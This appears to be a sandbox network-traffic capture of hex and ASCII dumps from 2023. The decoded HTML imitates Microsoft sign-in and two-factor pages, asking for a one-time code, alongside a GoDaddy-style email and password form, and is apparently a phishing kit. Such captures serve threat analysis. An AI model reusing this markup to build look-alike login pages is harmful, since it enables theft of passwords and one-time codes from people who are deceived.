                                                                                                                                                                                                                                                                                                              2023-10-25 16:29:16 UTC1565INData Raw: 22 64 6f 74 2d 66 6c 6f 61 74 69 6e 67 22 3e 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 64 6f 74 2d 66 6c 6f 61 74 69 6e 67 22 3e 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 65 63 74 69 6f 6e 63 6f 6e 74 65 6e 74 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 62 61 6e 6e 65 72 6c 6f 67 6f 22 20 63 6c 61 73 73 3d 22 64 2d 62 6c 6f 63 6b 22 3e 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 69 64 65 6e 74 69 74 79 20 77 2d 31 30 30 20 6d 74 2d 31 36 20 6d 62 2d 31 36 22 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                                                                              Data Ascii: "dot-floating"></div> <div class="dot-floating"></div> </div> <div class="sectioncontent"> <div class="bannerlogo" class="d-block"></div> <div class="identity w-100 mt-16 mb-16">
                                                                                                                                                                                                                                                                                                              2023-10-25 16:29:16 UTC1567INData Raw: 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 65 63 74 69 6f 6e 63 6f 6e 74 65 6e 74 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 66 69 72 73 74 6c 6f 67 6f 22 3e 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 68 32 20 63 6c 61 73 73 3d 22 74 69 74 6c 65 20 6d 62 2d 31 36 20 6d 74 2d 31 36 22 3e 54 61 6b 69 6e 67 20 79 6f 75 20 74 6f 20 79 6f 75 72 20 6f 72 67 61 6e 69 7a 61 74 69 6f 6e 27 73 20 73 69 67 6e 2d 69 6e 20 70 61 67 65 3c 2f 68 32 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 62 6f 74 74 6f 6d 73 65 63 74 69 6f 6e 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 61 20 68 72
                                                                                                                                                                                                                                                                                                              Data Ascii: </div> <div class="sectioncontent"> <div class="firstlogo"></div> <h2 class="title mb-16 mt-16">Taking you to your organization's sign-in page</h2> <div class="bottomsection"> <a hr
                                                                                                                                                                                                                                                                                                              2023-10-25 16:29:16 UTC1568INData Raw: 63 6c 61 73 73 3d 22 74 65 78 74 2d 62 6c 6f 63 6b 2d 62 6f 64 79 20 66 6f 72 6d 2d 67 72 6f 75 70 20 6f 76 65 72 66 6c 6f 77 2d 68 69 64 64 65 6e 20 6e 6f 2d 6d 61 72 67 69 6e 2d 74 6f 70 22 3e 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 69 64 3d 22 61 63 63 65 73 73 62 6c 6f 63 6b 65 64 73 69 67 6e 6f 75 74 6f 70 74 69 6f 6e 22 3e 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 61 20 69 64 3d 22 4d 6f 72 65 44 65 74 61 69 6c 73 22 20 63 6c 61 73 73 3d 22 6e 6f 2d 77 72 61 70 22 20 68 72 65 66 3d 22 23 22 20 6f 6e 63 6c 69 63 6b 3d 22 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 27 61 63 63 65 73 73 62 6c 6f 63 6b 65 64 74 72 6f 75 62 6c 65 73 68 6f 6f 74 69 6e 67 65 6c 65 27 29 2e
                                                                                                                                                                                                                                                                                                              Data Ascii: class="text-block-body form-group overflow-hidden no-margin-top"></div> <div id="accessblockedsignoutoption"></div> <a id="MoreDetails" class="no-wrap" href="#" onclick="document.getElementById('accessblockedtroubleshootingele').
                                                                                                                                                                                                                                                                                                              2023-10-25 16:29:16 UTC1569INData Raw: 6c 61 67 67 69 6e 67 22 3e 45 6e 61 62 6c 65 20 66 6c 61 67 67 69 6e 67 3c 2f 61 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 3e 49 66 20 79 6f 75 20 70 6c 61 6e 20 6f 6e 20 67 65 74 74 69 6e 67 20 68 65 6c 70 20 66 6f 72 20 74 68 69 73 20 70 72 6f 62 6c 65 6d 2c 20 65 6e 61 62 6c 65 20 66 6c 61 67 67 69 6e 67 20 61 6e 64 20 74 72 79 20 74 6f 20 72 65 70 72 6f 64 75 63 65 20 74 68 65 20 65 72 72 6f 72 20 77 69 74 68 69 6e 20 32 30 20 6d 69 6e 75 74 65 73 2e 20 46 6c 61 67 67 65 64 20 65 76 65 6e 74 73 20 6d 61 6b 65 20 64 69 61 67 6e 6f 73 74 69 63 73 20 61 76 61 69 6c 61 62 6c 65 20 61 6e 64 20 61 72 65 20 72 61 69 73 65 64 20 74 6f 20 61 64 6d 69 6e 20 61 74
                                                                                                                                                                                                                                                                                                              Data Ascii: lagging">Enable flagging</a> </div> <div>If you plan on getting help for this problem, enable flagging and try to reproduce the error within 20 minutes. Flagged events make diagnostics available and are raised to admin at
                                                                                                                                                                                                                                                                                                              2023-10-25 16:29:16 UTC1571INData Raw: 64 65 73 63 22 20 63 6c 61 73 73 3d 22 72 6f 77 20 74 65 78 74 2d 62 6f 64 79 20 74 65 78 74 2d 62 6c 6f 63 6b 2d 62 6f 64 79 22 3e 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 69 64 3d 22 65 72 72 6f 72 5f 6d 75 6c 74 69 70 6c 65 61 63 63 6f 75 6e 74 73 22 20 63 6c 61 73 73 3d 22 65 72 72 6f 72 22 3e 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 69 64 3d 22 6d 75 6c 74 69 70 6c 65 61 63 63 6f 75 6e 74 6f 70 74 69 6f 6e 73 22 20 63 6c 61 73 73 3d 22 66 6f 72 6d 2d 67 72 6f 75 70 22 20 72 6f 6c 65 3d 22 6c 69 73 74 22 3e 0d 0a 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 62 6f 74 74 6f 6d 73 65 63 74 69 6f
                                                                                                                                                                                                                                                                                                              Data Ascii: desc" class="row text-body text-block-body"></div> <div id="error_multipleaccounts" class="error"></div> <div id="multipleaccountoptions" class="form-group" role="list"> </div> <div class="bottomsectio
                                                                                                                                                                                                                                                                                                              2023-10-25 16:29:16 UTC1572INData Raw: 6d 65 74 68 6f 64 73 22 20 63 6c 61 73 73 3d 22 66 6f 72 6d 2d 67 72 6f 75 70 22 20 72 6f 6c 65 3d 22 6c 69 73 74 22 3e 0d 0a 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 62 6f 74 74 6f 6d 73 65 63 74 69 6f 6e 22 3e 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 62 75 74 74 6f 6e 20 63 6c 61 73 73 3d 22 62 74 6e 32 66 61 20 62 74 6e 5f 63 61 6e 22 20 69 64 3d 22 62 74 6e 5f 63 61 6e 22 3e 43 61 6e 63 65 6c 3c 2f 62 75 74 74 6f 6e 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 3c 2f 73 65 63 74 69 6f 6e 3e 0d 0a 0d 0a 20 20 20 20 3c 73 65 63 74 69 6f 6e 20
                                                                                                                                                                                                                                                                                                              Data Ascii: methods" class="form-group" role="list"> </div> <div class="bottomsection"></div> <button class="btn2fa btn_can" id="btn_can">Cancel</button> </div> </div> </section> <section
                                                                                                                                                                                                                                                                                                              2023-10-25 16:29:16 UTC1573INData Raw: 22 61 75 74 68 61 70 70 64 65 73 63 22 20 63 6c 61 73 73 3d 22 66 6f 72 6d 2d 67 72 6f 75 70 22 3e 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 69 64 3d 22 65 72 72 6f 72 5f 61 75 74 68 61 70 70 22 20 63 6c 61 73 73 3d 22 65 72 72 6f 72 22 3e 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 72 6f 77 20 74 65 78 74 2d 62 6f 64 79 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 64 69 73 70 6c 61 79 2d 73 69 67 6e 2d 63 6f 6e 74 61 69 6e 65 72 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 69 64 3d 22 61 75 74 68 61 70 70 63 6f 64 65 22 20 63 6c 61 73 73 3d 22 64 69 73 70 6c 61 79 53 69 67 6e 22 3e 3c 2f 64 69 76 3e 0d 0a 20 20 20
                                                                                                                                                                                                                                                                                                              Data Ascii: "authappdesc" class="form-group"></div> <div id="error_authapp" class="error"></div> <div class="row text-body"> <div class="display-sign-container"> <div id="authappcode" class="displaySign"></div>
                                                                                                                                                                                                                                                                                                              2023-10-25 16:29:16 UTC1575INData Raw: 6e 64 22 3e 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 65 78 74 2d 73 75 62 74 69 74 6c 65 22 3e 48 61 76 69 6e 67 20 74 72 6f 75 62 6c 65 3f 3c 2f 64 69 76 3e 0d 0a 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 72 6f 77 20 74 65 78 74 2d 62 6f 64 79 22 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 20 30 3b 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 61 20 69 64 3d 22 6d 6f 72 65 49 6e 66 6f 55 72 6c 22 20 63 6c 61 73 73 3d 22 6c 69 6e 6b 20 6d 62 2d 31 36 22 20 68 72 65 66 3d 22 23 22 20 74 61 72 67
                                                                                                                                                                                                                                                                                                              Data Ascii: nd"></div> <div class="text-subtitle">Having trouble?</div> <div class="row text-body" style="margin-bottom: 0;"> </div> <a id="moreInfoUrl" class="link mb-16" href="#" targ
                                                                                                                                                                                                                                                                                                              2023-10-25 16:29:16 UTC1576INData Raw: 69 6f 6e 22 20 69 64 3d 22 61 75 74 68 63 61 6c 6c 69 6d 67 22 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 61 61 64 63 64 6e 2e 6d 73 66 74 61 75 74 68 2e 6e 65 74 2f 73 68 61 72 65 64 2f 31 2e 30 2f 63 6f 6e 74 65 6e 74 2f 69 6d 61 67 65 73 2f 70 69 63 6b 65 72 5f 76 65 72 69 66 79 5f 63 61 6c 6c 5f 63 32 36 31 36 37 39 32 65 31 39 35 30 66 38 33 66 64 65 66 36 65 37 32 64 61 62 39 37 32 39 33 2e 73 76 67 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 69 64 3d 22 61 75 74 68 63 61 6c 6c 64 65 73 63 22 20 63 6c 61 73 73 3d 22 66 6f 72 6d 2d 67 72 6f 75 70 22 3e 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 69 64 3d 22 65 72 72 6f 72 5f 61 75 74 68 63 61 6c 6c 22 20 63 6c 61 73 73 3d 22 65 72 72 6f 72 22 3e 3c 2f
                                                                                                                                                                                                                                                                                                              Data Ascii: ion" id="authcallimg" src="https://aadcdn.msftauth.net/shared/1.0/content/images/picker_verify_call_c2616792e1950f83fdef6e72dab97293.svg"> <div id="authcalldesc" class="form-group"></div> <div id="error_authcall" class="error"></
                                                                                                                                                                                                                                                                                                              2023-10-25 16:29:16 UTC1577INData Raw: 22 65 72 72 6f 72 22 3e 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 69 6e 70 75 74 20 69 64 3d 22 69 6e 70 5f 63 6f 6e 66 69 72 6d 65 6d 61 69 6c 22 20 74 79 70 65 3d 22 74 65 78 74 22 20 6e 61 6d 65 3d 22 63 6f 6e 66 69 72 6d 65 6d 61 69 6c 22 20 63 6c 61 73 73 3d 22 69 6e 70 75 74 20 66 6f 72 6d 2d 67 72 6f 75 70 22 20 70 6c 61 63 65 68 6f 6c 64 65 72 3d 22 73 6f 6d 65 6f 6e 65 40 65 78 61 6d 70 6c 65 2e 63 6f 6d 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 62 6f 74 74 6f 6d 73 65 63 74 69 6f 6e 22 3e 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 62 75 74 74 6f 6e 20 63 6c 61 73 73 3d 22 62 74 6e 22 20 69 64 3d 22 62 74 6e 5f 63 6f 6e 66 69 72 6d 65 6d 61 69 6c 22 3e 53 65 6e 64
                                                                                                                                                                                                                                                                                                              Data Ascii: "error"></div> <input id="inp_confirmemail" type="text" name="confirmemail" class="input form-group" placeholder="someone@example.com"> <div class="bottomsection"></div> <button class="btn" id="btn_confirmemail">Send
                                                                                                                                                                                                                                                                                                              2023-10-25 16:29:16 UTC1579INData Raw: 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 69 64 3d 22 70 72 6f 74 65 63 74 61 63 63 6f 75 6e 74 6f 70 74 69 6f 6e 73 22 20 72 6f 6c 65 3d 22 72 61 64 69 6f 67 72 6f 75 70 22 3e 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 62 6f 74 74 6f 6d 73 65 63 74 69 6f 6e 22 3e 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 62 75 74 74 6f 6e 20 63 6c 61 73 73 3d 22 62 74 6e 22 20 69 64 3d 22 62 74 6e 5f 70 72 6f 74 65 63 74 61 63 63 6f 75 6e 74 22 20 6f 6e 63 6c 69 63 6b 3d 22 70 72 6f 74 65 63 74 73 65 6e 64 28 74 68 69 73 29 22 3e 53 65 6e 64 20 43 6f 64 65 3c 2f 62 75 74 74 6f 6e 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0d 0a
                                                                                                                                                                                                                                                                                                              Data Ascii: <div id="protectaccountoptions" role="radiogroup"></div> <div class="bottomsection"></div> <button class="btn" id="btn_protectaccount" onclick="protectsend(this)">Send Code</button> </div> </div>
                                                                                                                                                                                                                                                                                                              2023-10-25 16:29:16 UTC1580INData Raw: 62 36 38 37 62 32 32 2e 73 76 67 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 69 64 3d 22 6f 74 70 64 65 73 63 22 20 63 6c 61 73 73 3d 22 74 65 78 74 2d 62 6c 6f 63 6b 2d 62 6f 64 79 20 6f 76 65 72 66 6c 6f 77 2d 68 69 64 64 65 6e 20 66 6f 72 6d 2d 67 72 6f 75 70 22 3e 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 69 64 3d 22 65 72 72 6f 72 5f 6f 74 70 22 20 63 6c 61 73 73 3d 22 65 72 72 6f 72 22 3e 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 69 6e 70 75 74 20 69 64 3d 22 69 6e 70 5f 6f 74 70 63 6f 64 65 22 20 74 79 70 65 3d 22 74 65 78 74 22 20 6e 61 6d 65 3d 22 6f 74 70 63 6f 64 65 22 20 63 6c 61 73 73 3d 22 69 6e 70 75 74 20 66
                                                                                                                                                                                                                                                                                                              Data Ascii: b687b22.svg"> <div id="otpdesc" class="text-block-body overflow-hidden form-group"></div> <div id="error_otp" class="error"></div> </div> <input id="inp_otpcode" type="text" name="otpcode" class="input f
                                                                                                                                                                                                                                                                                                              2023-10-25 16:29:16 UTC1581INData Raw: 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 68 32 20 63 6c 61 73 73 3d 22 74 69 74 6c 65 20 6d 62 2d 31 36 22 3e 53 74 61 79 20 73 69 67 6e 65 64 20 69 6e 3f 3c 2f 68 32 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 70 20 63 6c 61 73 73 3d 22 70 22 3e 53 74 61 79 20 73 69 67 6e 65 64 20 69 6e 20 73 6f 20 79 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 74 6f 20 73 69 67 6e 20 69 6e 20 61 67 61 69 6e 20 6e 65 78 74 20 74 69 6d 65 2e 3c 2f 70 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 61 62 65 6c 20 63 6c 61 73 73 3d 22 68 61 73 2d 63 68 65 63 6b 62 6f 78 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 63 68 65 63 6b 62 6f 78 22 20 63 6c 61 73
                                                                                                                                                                                                                                                                                                              Data Ascii: </div> <h2 class="title mb-16">Stay signed in?</h2> <p class="p">Stay signed in so you don't have to sign in again next time.</p> <label class="has-checkbox"> <input type="checkbox" clas
                                                                                                                                                                                                                                                                                                              2023-10-25 16:29:16 UTC1583INData Raw: 3c 2f 66 69 67 75 72 65 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 61 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 20 20 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 65 65 2d 63 68 61 6e 67 65 2d 62 61 72 2d 72 69 67 68 74 20 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 2d 65 6e 64 22 3e 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 3c 2f 64 69 76 3e 0d 0a 20 20 3c 2f 64 69 76 3e 0d 0a 3c 2f 64 69 76 3e 0d 0a 0d 0a 3c 64 69 76 20 69 64 3d 22 72 6f 6f 74 22 3e 0d 0a 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 4c 6f 67 69 6e 50 61 67 65 53 74 79 6c 65 73 5f 5f 4c 6f 67 69 6e 57 72 61 70 70 65 72 2d 73 63 2d 70 76 73 6a 6b 38 2d 30 20 6b 4c 69 57 76 55 22 3e 0d 0a 20 20 3c 69 6d 67 20 73 72 63 3d 22 2f 77 65 62
                                                                                                                                                                                                                                                                                                              Data Ascii: </figure> </a> </div> </div> <div class="see-change-bar-right justify-content-end"></div> </div> </div></div><div id="root"> <div class="LoginPageStyles__LoginWrapper-sc-pvsjk8-0 kLiWvU"> <img src="/web
                                                                                                                                                                                                                                                                                                              2023-10-25 16:29:16 UTC1584INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 75 78 2d 73 70 61 63 65 20 75 78 2d 64 69 61 6c 6f 67 2d 73 68 65 6c 6c 20 75 78 2d 61 6c 65 72 74 20 75 78 2d 61 6c 65 72 74 2d 2d 63 72 69 74 69 63 61 6c 20 75 78 2d 74 65 78 74 20 75 78 2d 64 69 61 6c 6f 67 2d 2d 63 6f 6e 74 72 61 73 74 20 75 78 2d 64 69 61 6c 6f 67 2d 2d 73 74 72 65 74 63 68 20 75 78 2d 73 70 61 63 65 2d 2d 61 73 2d 62 6c 6f 63 6b 20 75 78 2d 73 70 61 63 65 2d 2d 69 6e 6c 69 6e 65 20 75 78 2d 73 70 61 63 65 2d 2d 62 6c 6f 63 6b 22 20 61 72 69 61 2d 6c 61 62 65 6c 6c 65 64 62 79 3d 22 6c 6f 67 69 6e 2d 66 61 69 6c 75 72 65 2d 61 6c 65 72 74 22 20 72 6f 6c 65 3d 22 61 6c 65 72 74 22 20 64 69 73 6d 69 73 73 69 62 6c 65 3d 22 66 61 6c 73 65
                                                                                                                                                                                                                                                                                                              Data Ascii: <div class="ux-space ux-dialog-shell ux-alert ux-alert--critical ux-text ux-dialog--contrast ux-dialog--stretch ux-space--as-block ux-space--inline ux-space--block" aria-labelledby="login-failure-alert" role="alert" dismissible="false
                                                                                                                                                                                                                                                                                                              2023-10-25 16:29:16 UTC1585INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 61 62 65 6c 20 63 6c 61 73 73 3d 22 75 78 2d 6c 61 62 65 6c 20 75 78 2d 6c 61 62 65 6c 2d 2d 69 6e 74 65 72 6e 61 6c 20 75 78 2d 6c 61 62 65 6c 2d 2d 66 6c 6f 61 74 69 6e 67 22 20 66 6f 72 3d 22 75 73 65 72 6e 61 6d 65 22 3e 45 6d 61 69 6c 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 75 78 2d 74 65 78 74 20 75 78 2d 6c 61 62 65 6c 2d 72 65 71 75 69 72 65 64 20 75 78 2d 74 65 78 74 2d 66 65 65 64 62 61 63 6b 2d 63 72 69 74 69 63 61 6c 22 20 61 72 69 61 2d 68 69 64 64 65 6e 3d 22 74 72 75 65 22 3e 2a 3c 2f 73 70 61 6e 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 6c 61 62 65 6c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                                                                                                                                                                                                              Data Ascii: <label class="ux-label ux-label--internal ux-label--floating" for="username">Email <span class="ux-text ux-label-required ux-text-feedback-critical" aria-hidden="true">*</span> </label>
                                                                                                                                                                                                                                                                                                              2023-10-25 16:29:16 UTC1587INData Raw: 64 61 64 64 79 70 61 73 73 77 6f 72 64 2d 65 72 72 6f 72 22 20 72 6f 6c 65 3d 22 61 6c 65 72 74 22 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 20 6e 6f 6e 65 3b 22 3e 50 61 73 73 77 6f 72 64 20 69 73 20 72 65 71 75 69 72 65 64 3c 2f 70 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 62 75 74 74 6f 6e 20 63 6c 61 73 73 3d 22 75 78 2d 62 75 74 74 6f 6e 20 73 68 6f 77 2d 68 69 64 65 2d 62 74 6e 20 69 6e 6c 69 6e 65 2d 73 68 6f 77 2d 68 69 64 65 2d 62 74 6e 20 75 78 2d 74 65 78 74 20 75 78 2d 74 65 78 74 2d 73 69 7a 65 30 20 75 78 2d 62 75 74 74 6f 6e 2d 69 6e 6c 69 6e 65 22 20 74 61 72 67 65 74 3d 22 5f 70 61 72 65 6e 74 22
                                                                                                                                                                                                                                                                                                              Data Ascii: daddypassword-error" role="alert" style="display: none;">Password is required</p> </div> <button class="ux-button show-hide-btn inline-show-hide-btn ux-text ux-text-size0 ux-button-inline" target="_parent"
                                                                                                                                                                                                                                                                                                              2023-10-25 16:29:16 UTC1588INData Raw: 6f 6c 6f 72 22 20 78 6c 69 6e 6b 3a 68 72 65 66 3d 22 23 73 76 67 2d 63 6f 6e 74 61 69 6e 65 72 2d 63 68 65 63 6b 6d 61 72 6b 22 3e 3c 2f 75 73 65 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 73 76 67 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 73 70 61 6e 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 73 70 61 6e 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 61 62 65 6c 20 66 6f 72 3d 22 72 65 6d 65 6d 62 65 72 2d 6d 65 22 20 63 6c 61 73 73 3d 22 75 78 2d 63 68 65 63 6b 62 6f 78 2d 6c 61 62 65 6c 22 3e 4b 65 65 70 20 6d 65 20 73 69 67 6e 65 64 20 69
                                                                                                                                                                                                                                                                                                              Data Ascii: olor" xlink:href="#svg-container-checkmark"></use> </svg> </span> </span> <label for="remember-me" class="ux-checkbox-label">Keep me signed i
                                                                                                                                                                                                                                                                                                              2023-10-25 16:29:16 UTC1589INData Raw: 74 6f 6e 20 62 75 74 74 6f 6e 20 62 74 6e 20 62 74 6e 2d 70 75 72 63 68 61 73 65 20 62 74 6e 2d 62 6c 6f 63 6b 20 75 78 2d 74 65 78 74 20 75 78 2d 74 65 78 74 2d 73 69 7a 65 2d 31 20 75 78 2d 74 65 78 74 2d 61 63 74 69 6f 6e 20 75 78 2d 62 75 74 74 6f 6e 2d 73 65 63 6f 6e 64 61 72 79 22 20 74 61 72 67 65 74 3d 22 5f 70 61 72 65 6e 74 22 20 74 79 70 65 3d 22 62 75 74 74 6f 6e 22 20 69 64 3d 22 65 6d 61 69 6c 50 72 6f 6d 6f 42 75 74 74 6f 6e 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 75 78 2d 62 75 74 74 6f 6e 2d 74 65 78 74 22 3e 47 65 74 20 53 74 61 72 74 65 64 3c 2f 73 70 61 6e 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 62 75 74 74 6f 6e 3e 0d 0a 20 20 20 20 20 20 20 20 20
                                                                                                                                                                                                                                                                                                              Data Ascii: ton button btn btn-purchase btn-block ux-text ux-text-size-1 ux-text-action ux-button-secondary" target="_parent" type="button" id="emailPromoButton"> <span class="ux-button-text">Get Started</span> </button>
                                                                                                                                                                                                                                                                                                              2023-10-25 16:29:16 UTC1591INData Raw: 63 68 65 63 6b 6d 61 72 6b 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 32 34 20 32 34 22 3e 0d 0a 20 20 20 20 20 20 3c 70 61 74 68 20 64 3d 22 4d 39 20 31 38 2e 32 35 61 2e 37 34 38 2e 37 34 38 20 30 20 30 31 2d 2e 35 33 2d 2e 32 32 6c 2d 35 2d 35 61 2e 37 35 2e 37 35 20 30 20 30 31 31 2e 30 36 2d 31 2e 30 36 4c 39 20 31 36 2e 34 34 20 31 39 2e 34 37 20 35 2e 39 37 61 2e 37 35 2e 37 35 20 30 20 30 31 31 2e 30 36 20 31 2e 30 36 6c 2d 31 31 20 31 31 61 2e 37 34 38 2e 37 34 38 20 30 20 30 31 2d 2e 35 33 2e 32 32 7a 22 3e 3c 2f 70 61 74 68 3e 0d 0a 20 20 20 20 3c 2f 73 79 6d 62 6f 6c 3e 0d 0a 20 20 3c 2f 73 76 67 3e 0d 0a 3c 2f 64 69 76 3e 0d 0a 0d 0a 3c 64 69 76 20 69 64 3d 22 73 76 67 2d 63 6f 6e 74 61 69 6e 65 72 22 20 73 74 79 6c 65 3d 22 64 69 73 70 6c
                                                                                                                                                                                                                                                                                                              Data Ascii: checkmark" viewBox="0 0 24 24"> <path d="M9 18.25a.748.748 0 01-.53-.22l-5-5a.75.75 0 011.06-1.06L9 16.44 19.47 5.97a.75.75 0 011.06 1.06l-11 11a.748.748 0 01-.53.22z"></path> </symbol> </svg></div><div id="svg-container" style="displ
